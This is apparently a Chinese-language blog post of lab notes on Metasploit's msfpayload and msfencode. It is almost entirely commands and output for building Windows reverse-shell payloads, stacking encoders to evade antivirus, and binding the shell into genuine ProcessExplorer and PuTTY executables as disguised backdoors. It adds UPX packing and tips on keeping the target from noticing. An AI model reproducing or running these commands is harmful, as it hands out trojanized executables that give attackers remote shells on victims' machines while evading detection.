使用编码器
msfencode -l 查看编码
不知道是不是书上那个有错 输出 exe那里 反正改成 -exe 它就能生成
msfpayload windows/shell_reverse_tcp LHOST=192.168.159.128 LPORT=31337 R msfencode -e x86/shikata_ga_nai -t -exe > /root/Desktop/payload3.exe
4 多种编码 注意-exe -o 那里 没有> 直接 /var/www/payload3.exe 数字均代表使用对应编码几次
msfpayload windows/shell_reverse_tcp LHOST=192.168.159.128 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 8 -t exe -o /root/Desktop/payload4.exe
下面这个编码自己配的 上不了线 晕
msfpayload windows/shell_reverse_tcp LHOST=192.168.159.128 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/fnstenv_mov -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 8 -t exe -o /root/Desktop/payload4.exe
[*] x86/countdown succeeded with size 1625 (iteration=1)
[*] x86/countdown succeeded with size 1643 (iteration=2)
[*] x86/countdown succeeded with size 1661 (iteration=3)
[*] x86/countdown succeeded with size 1679 (iteration=4)
[*] x86/countdown succeeded with size 1697 (iteration=5)
5 自定义Payload模板(捆绑+签名+编码)
wget http://download.sysinternals.com/files/ProcessExplorer.zip 下载微软的processExplorer
root@K8team:~/Desktop# unzip ProcessExplorer.zip
Archive: ProcessExplorer.zip
inflating: Eula.txt
inflating: procexp.chm
inflating: procexp.exe
root@K8team:~/Desktop# msfpayload windows/shell_reverse_tcp LHOST=192.168.159.128 LPORT=31337 R | msfencode -t exe -x /root/Desktop/procexp.exe -o /root/Desktop/payload5.exe -e x86/shikata_ga_nai -c 5
实测 在WIN2003下 第一次运行时 提示 什么签名有误(好像是微软的自校验 换另一个模板应该没问题) 再次运行 NC上线
使用UPX压缩 BT5-R3里自带 3.04
upx -5 /root/Desktop/payload5.exe
6 隐秘启动 一个攻击载荷 payload
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
msfpayload windows/shell_reverse_tcp LHOST=192.168.21.129 LPORT=31337 R | msfencode -t exe -x ./putty.exe -o /root/Desktop/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5
-K选项 设置payload在一个独立线程中启动 这样被宿主程序不会受到影响
-k选项不一定能用在所有程序上 所以攻击前 你必须经过设置
如果想把payload捆到可执行文件 最好使用图形界面 就算没启用-k参数 攻击时也不会启动任何窗口
因为命令行窗口 运行后 在显示黑框 而且要等到payload使用完毕 它才消失
请一定要注意这个小细节 要不然攻击时 很容易惊动目标
沒有留言:
張貼留言